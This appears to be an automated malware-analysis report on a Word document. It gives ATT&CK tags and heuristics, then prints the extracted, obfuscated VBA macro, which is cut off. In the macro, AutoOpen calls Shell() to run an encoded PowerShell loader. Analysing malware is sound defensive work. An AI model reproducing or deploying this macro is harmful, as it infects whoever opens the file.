Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen subroutine that calls a function which uses the Shell() command. This function attempts to construct and execute a command string, likely to download and execute a second-stage payload. The constructed command string is 'vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + hXUZAbip + dhiZTz + SjwCFiRXE', which appears to be an obfuscated attempt to run a PowerShell command.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12616 bytes |

SHA-256 of macros.bas: 18f783f27469e7d652a1968a748478fe043e59aa693b91d40390695d960a83e0

Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "GrskhWwiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjPltPav()
On Error Resume Next
For qqRiW = GhwVj To RsGzp
For YAMGIQ = YWibTE To 48241
KkaAsu = (88725 / CBool(rirzVT) - tTmha / Oct(66325 / Hex(86928) / hApwDb + Rnd(cRHWH / Fix(37))))
Next
fzzwi = 30039 - 40577
Next
For QRXETl = jWwJR To tzCwqJ
For CarwMt = UplwS To 46358
RjStj = (80096 / CBool(vvJMqJ) - zuAnFj / Oct(48839 / Hex(81574) / YsaXnr + Rnd(BrsqcP / Fix(37))))
Next
CHUoGf = 64246 - 73199
Next
BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765)
For kbUul = NojaJ To AJRJEK
For VzSKj = zflvS To 21953
mWpwSw = (97888 / CBool(dEHBGp) - wCiBU / Oct(47945 / Hex(31105) / RRkjo + Rnd(btQPQI / Fix(37))))
Next
TVqILQ = 84446 - 86480
Next
End Function
Sub Autoopen()
On Error Resume Next
For IdWvj = QRrTVw To iiMKN
For Kqmpj = fjntI To 15825
fGJHN = (87205 / CBool(sczYzm) - vrIvBC / Oct(79514 / Hex(65678) / WnpWB + Rnd(dXiLz / Fix(37))))
Next
RVazR = 32631 - 20123
Next
BjPltPav
For qOsutk = iwHFiz To mTYXvp
For cploMd = hvkli To 111
IvucRN = (97045 / CBool(aGOVj) - HbuVUi / Oct(28319 / Hex(46436) / FhGTw + Rnd(XTEzH / Fix(37))))
Next
XduicB = 6659 - 28911
Next
End Sub
Attribute VB_Name = "aqznaUpQJRP"
Function mbhjLO()
On Error Resume Next
For sfkknb = FGBap To hkaiZ
For qTLvQ = psKjNU To 90880
wwPXXV = (70445 / CBool(kldJjp) - fiIVV / Oct(73261 / Hex(34702) / kTwziH + Rnd(tjfPN / Fix(37))))
Next
VDLDlJ = 68172 - 49693
Next
rUdAbUdo = "HeLL -e IAAoAG" + "4AZQBX" + "AC0ATwBCAEoARQB" + "DAHQAIAAgAFMAe" + "QB" + "zAF" + "QAZQBtA"
For GHzoi = Ezaoj To fDbXC
For OsziR = SKbzRj To 54746
HSMozt = (55723 / CBool(phEah) - pzkjj / Oct(70869 / Hex(40131) / UcpXWU + Rnd(GhqLzH / Fix(37))))
Next
rmZIv = 96071 - 6582
Next
DbozKaYhlw = "C4ASQBPAC4AQw" + "BPAG0AcABSAEUAc" + "wBTAGkATwBOAC4A" + "RABF" + "AGYAbABBAFQ" + "ARQBzAFQAcgBlA" + "EEAbQAo" + "AFsA"
For ZqvwU = NkArNa To kzaXIm
For zOPjOc = wGapW To 57440
CzcZz = (4623 / CBool(zqUkhP) - nzlnL / Oct(39995 / Hex(30785) / bLisT + Rnd(dZCqw / Fix(37))))
Next
hzzzJk = 79839 - 4402
Next
tDLDfi = "UwB" + "ZAFMAdABF" + "AG0ALgBpAG" + "8AL"
For uzhNB = HpCLJ To rXQqGj
For TQRtkW = nCnda To 60156
mjMBi = (32801 / CBool(WjAfn) - qbjHC / Oct(1796 / Hex(22676) / HcFwrd + Rnd(FCYkd / Fix(37))))
Next
FqEpbS = 48499 - 95307
Next
oJjbFO = "gBNAGUATQB" + "vA" + "FIAWQBzAHQ" + "AcgBlAG" + "EAbQB"
For ROzSiL = jaaTf To DGFnnh
For jcuJc = kcRaim To 71213
LrwYuL = (69128 / CBool(zKKwZ) - zkoisj / Oct(916 / Hex(79067) / opzbt + Rnd(ArjuF / Fix(37))))
Next
PGOsVj = 19856 - 58614
Next
KzUiztjBnGr = "dAFsAcwBZ" + "AHMA" + "VABlAG0A" + "LgBjAG8AbgBWA" + "GUAUgBUAF0A" + "OgA6AGY" + "AUgBPAE0AYgB" + "BA" + "HMARQA2" + "ADQAUwB"
For zjLzfh = EuEZWY To jzkqI
For TdCUui = ZlWAqK To 68559
JmdOhN = (75742 / CBool(pfVqwf) - lpChQV / Oct(58783 / Hex(81817) / wDNSY + Rnd(jLoVa / Fix(37))))
Next
Hcajf = 82658 - 23252
Next
pOGXJZJzfV = "0AHIAaQBOAEcAK" + "AAg" + "ACcAVgBa" + "AEIAdAB" + "UADgASgBB" + "AEQATQ" + "BlAC8AeQByADE" + "AWQ" + "BzAGkAMw"
For Zrhtql = ndSTi To aRdAVO
For vJCaFj = NbzkiS To 2408
FVUbmt = (91551 / CBool(VCvPjL) - jKcatP / Oct(79300 / Hex(13537) / GHzMjh + Rnd(MuwMHf / Fix(37))))
Next
brAbjY = 19854 - 38483
Next
QiVKiZzuh = "BLAEw" + "AWQ" + "BaAEUAaABN" + "AFUARQBlAFQA" + "QQBZAE0AOABLAG" + "oAbwBEAEUAe" + "AB0ADEAdABoAEIA" + "KwBOAHU" + "AMwBoAF" + "UAS"
For BiNaCs = OPOjV To wjBnOj
For kzpDR = isoIi To 56110
KvhTHm = (38183 / CBool(iwtzXw) - RZsJaw / Oct(23599 / Hex(4394) / JIBJOa
... (truncated)
```